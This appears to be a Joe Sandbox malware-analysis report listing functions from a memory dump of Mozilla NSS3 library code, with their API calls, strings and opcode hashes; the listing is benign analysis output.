Part of subcall function 6CE6BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CE6BBEB
Part of subcall function 6CE6BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CE6BBFB
Part of subcall function 6CE6BB80: GetLastError.KERNEL32 ref: 6CE6BC03
Part of subcall function 6CE6BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CE6BC19
Part of subcall function 6CE6BB80: free.MOZGLUE(00000000), ref: 6CE6BC22

PR_NewCondVar.NSS3(?), ref: 6CF99CF0
PR_NewPollableEvent.NSS3 ref: 6CF99D03

Part of subcall function 6CF8F3B0: PR_CallOnce.NSS3(6CFE14B0,6CF8F510), ref: 6CF8F3E6
Part of subcall function 6CF8F3B0: PR_CreateIOLayerStub.NSS3(6CFE006C), ref: 6CF8F402
Part of subcall function 6CF8F3B0: PR_Malloc.NSS3(00000004), ref: 6CF8F416
Part of subcall function 6CF8F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6CF8F42D
Part of subcall function 6CF8F3B0: PR_SetSocketOption.NSS3(?), ref: 6CF8F455
Part of subcall function 6CF8F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6CF8F473

Part of subcall function 6CF49890: TlsGetValue.KERNEL32(?,?,?,6CF497EB), ref: 6CF4989E

EnterCriticalSection.KERNEL32(?), ref: 6CF99D78
calloc.MOZGLUE(00000001,0000000C), ref: 6CF99DAF
_PR_CreateThread.NSS3(00000000,6CF99EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6CF99D9F

Part of subcall function 6CE6B3C0: TlsGetValue.KERNEL32 ref: 6CE6B403
Part of subcall function 6CE6B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6CE6B459

_PR_CreateThread.NSS3(00000000,6CF9A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6CF99DE8
calloc.MOZGLUE(00000001,0000000C), ref: 6CF99DFC
_PR_CreateThread.NSS3(00000000,6CF9A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6CF99E29
calloc.MOZGLUE(00000001,0000000C), ref: 6CF99E3D
_PR_MD_UNLOCK.NSS3(?), ref: 6CF99E71
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CF99E89

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
String ID:
API String ID: 4254102231-0
Opcode ID: 14456d99fc045e609c04758cb0c07c68437fdbf9497277ce036035ea828ddabe
Instruction ID: bf444f5c451feadacf44eeb21407395d38a034616a4ecd1cbbbaa35422d2136b
Opcode Fuzzy Hash: 14456d99fc045e609c04758cb0c07c68437fdbf9497277ce036035ea828ddabe
Instruction Fuzzy Hash: 68614FB1E10706AFEB14DF75D844AA77BF8FF08208B15452AE859C7B11EB70E914CBA1

Function 6CE93FF0 Relevance: 27.2, APIs: 18, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

SECKEY_CopyPublicKey.NSS3(?), ref: 6CE94014

Part of subcall function 6CE939F0: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6CE95E6F,?), ref: 6CE93A08
Part of subcall function 6CE939F0: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6CE95E6F), ref: 6CE93A1C
Part of subcall function 6CE939F0: memset.VCRUNTIME140(-00000004,00000000,000000A8,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CE93A3C

PORT_NewArena_Util.NSS3(00000800), ref: 6CE94038

Part of subcall function 6CEE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE887ED,00000800,6CE7EF74,00000000), ref: 6CEE1000
Part of subcall function 6CEE0FF0: PR_NewLock.NSS3(?,00000800,6CE7EF74,00000000), ref: 6CEE1016
Part of subcall function 6CEE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CE887ED,00000008,?,00000800,6CE7EF74,00000000), ref: 6CEE102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6CE9404D

Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE10F3
Part of subcall function 6CEE10C0: EnterCriticalSection.KERNEL32(?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE110C
Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1141
Part of subcall function 6CEE10C0: PR_Unlock.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1182
Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE119C

SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6CFAA0F4), ref: 6CE940C2

Part of subcall function 6CEDF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6CEDF0C8
Part of subcall function 6CEDF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CEDF122

SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,00000010,00000000), ref: 6CE9409A

Part of subcall function 6CEDBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6CE8E708,00000000,00000000,00000004,00000000), ref: 6CEDBE6A
Part of subcall function 6CEDBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CE904DC,?), ref: 6CEDBE7E
Part of subcall function 6CEDBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CEDBEC2

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE940DE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE940F4
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE94108
SECITEM_CopyItem_Util.NSS3(00000000,?,00000010), ref: 6CE9411A
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,000000C8), ref: 6CE94137
SECITEM_CopyItem_Util.NSS3(00000000,-0000001C,-00000020), ref: 6CE94150
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,-00000010,6CFAA1C8), ref: 6CE9417E
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,0000007C), ref: 6CE94194
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CE941A7
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE941B2
PK11_DestroyObject.NSS3(?,?), ref: 6CE941D9
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CE941FC
SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6CFAA1A8), ref: 6CE9422D

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Item_$Arena_$Copy$ArenaFree$AlgorithmEncodeError$Alloc_Value$AllocateCriticalDestroyEnterFindInitK11_LockObjectPoolPublicSectionTag_UnlockZfreecallocmemset
String ID:
API String ID: 912348568-0
Opcode ID: d91e9ac2f8b01a07850974b9ccaf4d52e7b24db5f9949fd0b89982e168b1c9cf
Instruction ID: 1a39cfc3ea9b64a05da184623d2338bfc02e16e87e9f93cefa15e4f1833045af
Opcode Fuzzy Hash: d91e9ac2f8b01a07850974b9ccaf4d52e7b24db5f9949fd0b89982e168b1c9cf
Instruction Fuzzy Hash: C65107B6A003006BF7109B669C41B6776FCDF5524CF24452EED69C7F82FB31E50886A2

Function 6CED8E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6CED8E01,00000000,6CED9060,6CFE0B64), ref: 6CED8E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6CED8E01,00000000,6CED9060,6CFE0B64), ref: 6CED8E9E
PORT_ArenaAlloc_Util.NSS3(6CFE0B64,00000001,?,?,?,?,6CED8E01,00000000,6CED9060,6CFE0B64), ref: 6CED8EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6CED8E01,00000000,6CED9060,6CFE0B64), ref: 6CED8EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6CED8E01,00000000,6CED9060,6CFE0B64), ref: 6CED8ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6CED8E01,00000000,6CED9060,6CFE0B64), ref: 6CED8EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6CED8E01), ref: 6CED8EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CFE0B64,6CFE0B64), ref: 6CED8F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6CED8F3F

Part of subcall function 6CEDA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6CEDA421,00000000,00000000,6CED9826), ref: 6CEDA136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CED904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6CED8E76

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: 3ed2c91cddc81e7a33d17f63621103eba43bc2294d11787f84579f4e955ac3b2
Instruction ID: 81941083fb0acc2d3f03fa816c9d6e2714856c21dde796e6dd2cd7a530c63f4b
Opcode Fuzzy Hash: 3ed2c91cddc81e7a33d17f63621103eba43bc2294d11787f84579f4e955ac3b2
Instruction Fuzzy Hash: 2D616FB5D0020A9BDB10CF95DC80AABB7B5FF84358F254529DC18A7741EB32B916CBE1

Function 6CE88E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE88E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6CE88E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CE88EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CFB18D0,?), ref: 6CE88F03
PR_CallOnce.NSS3(6CFE2AA4,6CEE12D0), ref: 6CE88F19
PL_FreeArenaPool.NSS3(?), ref: 6CE88F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CE88F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CE88F65
PL_FinishArenaPool.NSS3(?), ref: 6CE88FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6CE88FFE
PR_CallOnce.NSS3(6CFE2AA4,6CEE12D0), ref: 6CE89012
PL_FreeArenaPool.NSS3(?), ref: 6CE89024
PL_FinishArenaPool.NSS3(?), ref: 6CE8902C
PORT_DestroyCheapArena.NSS3(?), ref: 6CE8903E

Strings

security, xrefs: 6CE88EE7

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: 7831f3abdbe54900ee7ad5030026a831a9294205d3d93abe42b12a73daeaff0a
Instruction ID: a7cfb2da81117ee02f23c7b8deb80782a4f01e38a387b45448211f0715ff78c2
Opcode Fuzzy Hash: 7831f3abdbe54900ee7ad5030026a831a9294205d3d93abe42b12a73daeaff0a
Instruction Fuzzy Hash: 18513DB1909300ABD7209A549C41FAB77F8AF8A75CF64082EFD4997B41E731D909C763

Function 6CEB4E60 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6CEB4E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CEB4EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEB4EC7

Part of subcall function 6CF9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CF9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CEB4EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CEB4F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEB4F1A
PR_LogPrint.NSS3(?,00000000), ref: 6CEB4F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6CEB4F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6CEB4F68

Strings

pTemplate = 0x%p, xrefs: 6CEB4F4A
C_GetAttributeValue, xrefs: 6CEB4E7E
hObject = 0x%x, xrefs: 6CEB4EF5, 6CEB4F05
ulCount = %d, xrefs: 6CEB4F63
hSession = 0x%x, xrefs: 6CEB4EA2, 6CEB4EB2
(CK_INVALID_HANDLE), xrefs: 6CEB4EC0, 6CEB4F13

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue
API String ID: 1003633598-3530272145
Opcode ID: 243c00df06cfebf5c005dfd6b1f2ea9cffe43736399bfed67890f2d32c91c279
Instruction ID: a0b30d67a859f4f175f9324a72e27d9816cd9a8a62062eb02b56ef823b37f58f
Opcode Fuzzy Hash: 243c00df06cfebf5c005dfd6b1f2ea9cffe43736399bfed67890f2d32c91c279
Instruction Fuzzy Hash: C9411631A01104FFEB40DF54DE49FAA77B5AB4630DF154429F5086B711DB359E09CBA1

Function 6CEB4CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6CEB4CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CEB4D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEB4D37

Part of subcall function 6CF9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CF9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CEB4D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CEB4D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEB4D8A
PR_LogPrint.NSS3(?,00000000), ref: 6CEB4DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6CEB4DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6CEB4E20

Strings

pulSize = 0x%p, xrefs: 6CEB4DB7
C_GetObjectSize, xrefs: 6CEB4CEE
hObject = 0x%x, xrefs: 6CEB4D65, 6CEB4D75
hSession = 0x%x, xrefs: 6CEB4D12, 6CEB4D22
(CK_INVALID_HANDLE), xrefs: 6CEB4D30, 6CEB4D83
*pulSize = 0x%x, xrefs: 6CEB4E1B

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
API String ID: 1003633598-3553622718
Opcode ID: f60a5572bf8435ac1cf076d0e239487e0ddd964e027452eb874ecd633946064e
Instruction ID: 67dddd8c433bbd78cdd6f15dfa5735175237064c14347dc6e99860f1dc5553c5
Opcode Fuzzy Hash: f60a5572bf8435ac1cf076d0e239487e0ddd964e027452eb874ecd633946064e
Instruction Fuzzy Hash: 2A41F671A00105FFEB849F50DE88B6A77B5EB4A30DF15442AF5087B712EB369D09CB61

Function 6CEB7C90 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Verify), ref: 6CEB7CB6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CEB7CE4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEB7CF3

Part of subcall function 6CF9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CF9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CEB7D09
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CEB7D2A
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CEB7D45
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6CEB7D5E
PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6CEB7D77

Strings

ulDataLen = %d, xrefs: 6CEB7D40
ulSignatureLen = %d, xrefs: 6CEB7D72
pData = 0x%p, xrefs: 6CEB7D25
pSignature = 0x%p, xrefs: 6CEB7D59
C_Verify, xrefs: 6CEB7CB1
hSession = 0x%x, xrefs: 6CEB7CCE, 6CEB7CDE
(CK_INVALID_HANDLE), xrefs: 6CEB7CEC

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify
API String ID: 1003633598-3278097884
Opcode ID: 767767e0f3c6f12cad9c80790194877c5b236fe3aa6aab9d828af23b28f320e1
Instruction ID: 9816063c367cd72353d12dd031856aca1d13ef8415c6e5b8c08c799113e2e123
Opcode Fuzzy Hash: 767767e0f3c6f12cad9c80790194877c5b236fe3aa6aab9d828af23b28f320e1
Instruction Fuzzy Hash: FB311531A00109FFDB84DF64DE48F6A7BB1AB4A30CF194428F50867B11DB329909CBB1

Function 6CEB2F00 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SetPIN), ref: 6CEB2F26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CEB2F54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CEB2F63

Part of subcall function 6CF9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CF9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CEB2F79
PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6CEB2F9A
PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6CEB2FB5
PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6CEB2FCE
PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6CEB2FE7

Strings

pNewPin = 0x%p, xrefs: 6CEB2FC9
pOldPin = 0x%p, xrefs: 6CEB2F95
ulNewLen = %d, xrefs: 6CEB2FE2
C_SetPIN, xrefs: 6CEB2F21
hSession = 0x%x, xrefs: 6CEB2F3E, 6CEB2F4E
ulOldLen = %d, xrefs: 6CEB2FB0
(CK_INVALID_HANDLE), xrefs: 6CEB2F5C

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN
API String ID: 1003633598-3716813897
Opcode ID: 966a0c3fd94b8ff342f339ef3d794e604bd3e4c2ea8903496ea7ac8e9a1207fa
Instruction ID: c2ee09617014792d390ef65541281191c4814193d033053369d471787dda2ae5
Opcode Fuzzy Hash: 966a0c3fd94b8ff342f339ef3d794e604bd3e4c2ea8903496ea7ac8e9a1207fa
Instruction Fuzzy Hash: 9C31D035A01145BFDB849B54DE4DF6A7BB1AF4A319F194018F808B7712EB329908CBA1

Function 6CF4CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CF4CC7B), ref: 6CF4CD7A

Part of subcall function 6CF4CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CEBC1A8,?), ref: 6CF4CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CF4CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CF4CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6CF4CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CF4CD8E

Part of subcall function 6CE705C0: PR_EnterMonitor.NSS3 ref: 6CE705D1
Part of subcall function 6CE705C0: PR_ExitMonitor.NSS3 ref: 6CE705EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6CF4CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CF4CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CF4CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CF4CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6CF4CE48

Strings

getaddrinfo, xrefs: 6CF4CD88, 6CF4CDF9
getnameinfo, xrefs: 6CF4CDB2, 6CF4CE23
ws2_32.dll, xrefs: 6CF4CD75
wship6.dll, xrefs: 6CF4CDE3
freeaddrinfo, xrefs: 6CF4CD9F, 6CF4CE10

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: 86b14ca1aec30b9d03ea11772a2aa21a7ffa2ca542fbf3d17eb6ba9ad6f5c544
Instruction ID: 697d1edfbd2a57854794416484d7a5a2474eb6ded47f5b7a58519f799cfa5291
Opcode Fuzzy Hash: 86b14ca1aec30b9d03ea11772a2aa21a7ffa2ca542fbf3d17eb6ba9ad6f5c544
Instruction Fuzzy Hash: ED11D6A5E1251222E7916B772C00B9B3C785B4210CF289938D815E5F43FB22CA4DC3F2

Function 6CF91C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON

Download Yara Rule

APIs

